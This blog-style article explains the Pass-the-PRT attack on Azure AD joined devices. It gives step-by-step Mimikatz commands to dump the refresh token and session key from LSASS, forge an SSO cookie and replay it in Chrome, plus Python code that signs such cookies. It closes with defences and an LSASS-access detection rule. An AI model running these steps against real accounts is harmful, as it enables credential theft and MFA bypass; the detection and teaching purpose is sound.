Moving laterally from on-prem into a cloud tenant with the Pass-the-PRT attack technique
Krishnendu De
Information Security Leadership | Red and Blue Teamer | Cloud Security Expert | OT Cyber Security | DFIR | Threat Intel| Critical Infrastructure Cyber Security Expert
Moving laterally from on-premises resources into a cloud tenant is more involved than moving between on-premises Windows machines. For the latter, attackers have a well-known toolbox: Pass-the-Ticket, Pass-the-Hash, Overpass-the-Hash and Golden Tickets, to name a few. A closely related replay technique also works for the hop from a compromised workstation to the cloud resources it is connected to, and it gets past strong authentication measures such as MFA because the replayed token already carries the MFA claim. Curious how? This article explains how attackers perform that lateral movement to the cloud with an attack called Pass-the-PRT.
What is a Primary Refresh Token (PRT)
Tired of constantly re-authenticating to Azure and Microsoft 365 resources? That is what the Primary Refresh Token (PRT) solves. Comparable to a Kerberos ticket-granting ticket, a PRT provides single sign-on for Windows 10 devices that are Azure AD joined or hybrid Azure AD joined.
How does it work? At sign-in, the Cloud Authentication Provider (CloudAP) on the Windows 10 device sends the user's credentials to Azure AD, which validates them and returns a PRT together with a session key. The device stores both in LSASS, and where the device has a Trusted Platform Module (TPM) the session key is additionally protected by the TPM. The session key is what proves possession of the PRT, which is why the attack below goes after it as well as the PRT itself.
The SSO happens in the browser. When you open a site that supports Azure AD SSO in a browser that understands it, the Cloud Authentication Provider issues a PRT cookie for that browser: a signed token built from the PRT and the session key. The site accepts the cookie and you are in without re-entering credentials or answering an MFA prompt. That cookie, named x-ms-RefreshTokenCredential, is the object the attack forges in Step 5.
To see whether your device holds a PRT, run:
dsregcmd /status
In the SSO State section, check AzureAdPrt; if it reads YES, you have a PRT.
If it reads NO, check the Device State section of the same output: AzureAdJoined must be YES, because a PRT is only issued to devices that are Azure AD joined or hybrid Azure AD joined.
A Pass-the-PRT attack gives an adversary access to web resources as the user, and because the PRT already carries the device identity and the MFA claim, cookies minted from it satisfy Conditional Access policies that require MFA or a managed device just as the legitimate device would. With the user's PRT and session key in hand, the adversary can keep creating PRT cookies for as long as the PRT is valid, up to two weeks, unless the account is disabled. The rest of this post walks through how the attack is performed, so that you know what to prevent and what to look for.
Here are the steps to extract the PRT from LSASS, decrypt its session key using the machine's DPAPI master key, and use both to create a new PRT cookie. Importing that cookie into a Chrome session authenticates you to websites as the user without ever knowing the password or handling an MFA prompt.
Step 1. Extract the PRT from LSASS
To see the PRT data on the machine we have compromised, run the following in Mimikatz release 2.2.0 20200807 or later (the release that introduced the cloudap module); both commands need local administrative rights:
privilege::debug
sekurlsa::cloudap
The output lists the cached CloudAP entries for logged-on users. Copy the value labeled PRT and save it for later.
If you don't see any PRT data, check whether the device is Azure AD joined by running dsregcmd /status as shown earlier. If AzureAdPrt is YES and Mimikatz still shows nothing, check which Windows 10 build the machine is running: the LSASS structures Mimikatz parses are build-specific, so a build newer than your Mimikatz release may not be supported.
Step 2. Extract the proof-of-possession key
From the same output, copy the value labeled ProofOfPosessionKey (spelled that way in the output). This is the session key; it is stored encrypted, and we need the machine's DPAPI master key to decrypt it.
Step 3. Decrypt the session key
The key is protected under the computer's DPAPI context, so we first elevate to SYSTEM and then ask Mimikatz to decrypt it with the DPAPI master key:
token::elevate
dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect
From the output, copy two values: Context and Derived Key. The derived key is what signs PRT cookies; Mimikatz computes it from the decrypted session key and that context.
Step 4. Generate PRT cookies.
The rest of the attack no longer needs the victim machine and can be run from any workstation, since it only needs the three values collected so far. To generate a PRT cookie, run:
dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /prt:[PRT]
The output includes the signed PRT cookie after Signature with key. Copy that text.
Step 5. Inject the PRT cookie into a browser session
Launch Google Chrome in incognito mode and navigate to https://login.microsoftonline.com. When you are prompted for your login data, right-click anywhere on the page and choose Inspect to open the Chrome dev tools.
Go to the Application tab, expand Cookies and click login.microsoftonline.com. In the pane on the right, in the top action bar, click the circle with a diagonal slash to clear all existing cookies. Then double-click an empty row in the table and add the following new cookie:
Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
HttpOnly: Set to True (checked)
Leave the other fields at their default values
Reload https://login.microsoftonline.com. The browser now presents the PRT cookie, and you are signed in as the user without a password or an MFA prompt.
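The following Python script is an added example, not code from this article or from Mimikatz, to make concrete what Steps 3 to 5 produce and what the token service checks when the cookie arrives. The derived key is the session key run through an SP800-108 counter-mode HMAC-SHA256 KDF with the label AzureAD-SecureConversation and the random context, and the PRT cookie is a JWT whose header carries that context (ctx) and whose HS256 signature is computed under the derived key. The KDF label and the header and payload field names follow publicly documented research on the PRT protocol rather than this page, and the session key and PRT values are constructed placeholders. verify_prt_cookie plays the role of the token service: it re-derives the key from the ctx header and the session key it holds for that PRT, which is why the PRT plus the session key (or an already derived key and its context) is all an attacker needs, and the user's password never enters the picture.

```python
import base64
import hashlib
import hmac
import json
import os
import time
from typing import Optional

# KDF label for PRT session keys, taken from public research on the PRT
# protocol (an assumption of this example; the article does not state it).
KDF_LABEL = b"AzureAD-SecureConversation"

# Constructed placeholders. A real session key comes out of Step 3 and a
# real PRT out of Step 1.
SAMPLE_SESSION_KEY = hashlib.sha256(b"constructed-session-key").digest()
SAMPLE_PRT = "0.constructed-primary-refresh-token"


def b64url(data: bytes) -> str:
    """Base64url without padding, as used for JWT segments."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def derive_key(session_key: bytes, context: bytes) -> bytes:
    """SP800-108 counter-mode KDF, HMAC-SHA256, one 256-bit output block:
    HMAC(session_key, [i=1]_32 || Label || 0x00 || Context || [L=256]_32).
    This corresponds to the 'Derived Key' value Mimikatz prints in Step 3."""
    fixed_input = (
        (1).to_bytes(4, "big")
        + KDF_LABEL
        + b"\x00"
        + context
        + (256).to_bytes(4, "big")
    )
    return hmac.new(session_key, fixed_input, hashlib.sha256).digest()


def make_prt_cookie(prt: str, session_key: bytes,
                    context: Optional[bytes] = None,
                    iat: Optional[int] = None) -> str:
    """Build the x-ms-RefreshTokenCredential value (Step 4): a JWT carrying
    the KDF context in its header, signed with HS256 under the derived key."""
    context = os.urandom(24) if context is None else context
    header = {"alg": "HS256", "typ": "JWT",
              "ctx": base64.b64encode(context).decode()}
    payload = {"refresh_token": prt, "is_primary": "true",
               "iat": int(time.time()) if iat is None else iat}
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode())
                     + "."
                     + b64url(json.dumps(payload, separators=(",", ":")).encode()))
    signature = hmac.new(derive_key(session_key, context),
                         signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(signature)


def verify_prt_cookie(cookie: str, session_key: bytes) -> Optional[dict]:
    """What the token service does with the cookie: read ctx from the header,
    re-derive the key from the session key it holds for this PRT, and check
    the HMAC. Returns the payload, or None if the signature does not verify."""
    try:
        head, body, sig = cookie.split(".")
        header = json.loads(b64url_decode(head))
        context = base64.b64decode(header["ctx"])
    except (ValueError, KeyError):
        return None
    expected = hmac.new(derive_key(session_key, context),
                        f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        return None
    return json.loads(b64url_decode(body))


def demo() -> dict:
    """Sign a cookie, verify it, then show that a forged signature and a
    wrong session key are both rejected."""
    cookie = make_prt_cookie(SAMPLE_PRT, SAMPLE_SESSION_KEY)
    head, body, _ = cookie.split(".")
    forged = f"{head}.{body}.{b64url(bytes(32))}"
    return {
        "valid": verify_prt_cookie(cookie, SAMPLE_SESSION_KEY),
        "forged": verify_prt_cookie(forged, SAMPLE_SESSION_KEY),
        "wrong_key": verify_prt_cookie(cookie, bytes(32)),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Two things to take from running it: the same PRT can be signed under a fresh context every time, so blocking one observed cookie value does not help, and the verifier never needs the password, only the secret that was lifted from LSASS.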
How to protect your cloud environment against Pass-the-PRT attack
Protecting against Pass-the-PRT matters for any organization with Azure AD joined devices. On the cloud side the attack is hard to spot because the replayed cookie goes through the legitimate SSO flow; what stands out is the context, for example a sign-in with the same device identity from an IP address or browser the device has never used before. There are, however, steps you can take.
One effective strategy is endpoint protection that detects Mimikatz, or more generally any process opening a handle to LSASS with memory-read access, since that is exactly what the first stage of the attack does. Prevention is better still: to perform Pass-the-PRT the intruder must already have gained access to a machine, and the Netwrix Active Directory Security Solution is positioned to keep malefactors from gaining that foothold in the first place.
Moreover, the attack requires local administrative rights: privilege::debug in Step 1 and token::elevate in Step 3 both depend on them. Removing standing admin rights from users, for example with endpoint management software such as Netwrix PolicyPak, takes that prerequisite away without hurting productivity; the same tooling can also stop computers from launching unapproved software and lock down browser settings.
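As an added example, not from the article, the endpoint detection recommended above can be written as a rule over Sysmon Event ID 10 (ProcessAccess) telemetry. Step 1 reads the CloudAP data out of LSASS, which requires a handle with PROCESS_VM_READ; the Python below flags any such handle whose source image is not on an allow list of processes expected to read LSASS. The allow list and the event records are constructed for the example and would have to be tuned to the security tooling actually deployed.

```python
from typing import List

LSASS_PATH = r"c:\windows\system32\lsass.exe"

# Windows process access-right bits relevant to credential dumping.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400

# Processes expected to open LSASS with read access on a typical host.
# Assumption for this example: extend it with the EDR/AV you actually run.
EXPECTED_LSASS_READERS = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed Sysmon Event ID 10 (ProcessAccess) records, not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"EventID": 10, "SourceImage": r"C:\Users\jdoe\Downloads\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Users\jdoe\Downloads\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "SourceImage": r"C:\Users\jdoe\Downloads\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1fffff"},
]


def is_suspicious_lsass_access(event: dict) -> bool:
    """True for a ProcessAccess event in which an unexpected process obtained
    a memory-read handle to LSASS."""
    if event.get("EventID") != 10:
        return False
    if event.get("TargetImage", "").lower() != LSASS_PATH:
        return False
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    # Dumping credentials needs to read LSASS memory. A handle without
    # PROCESS_VM_READ (Task Manager querying the process, for instance)
    # cannot do that, so it is not reported.
    if not granted & PROCESS_VM_READ:
        return False
    # Compare the full path, not the file name: a copied "svchost.exe" in a
    # user profile is not the one in System32.
    return event.get("SourceImage", "").lower() not in EXPECTED_LSASS_READERS


def find_suspicious_lsass_readers(events: List[dict]) -> List[str]:
    """Source images that obtained a memory-read handle to LSASS and are
    not on the allow list, in event order."""
    return [e["SourceImage"] for e in events if is_suspicious_lsass_access(e)]


if __name__ == "__main__":
    for image in find_suspicious_lsass_readers(SAMPLE_EVENTS):
        print("suspicious LSASS access from", image)
```

Matching on the access mask rather than on the name mimikatz.exe is deliberate: a renamed binary, or a memory dump taken with another tool and fed to Mimikatz offline, still has to open LSASS with read access and still produces this event.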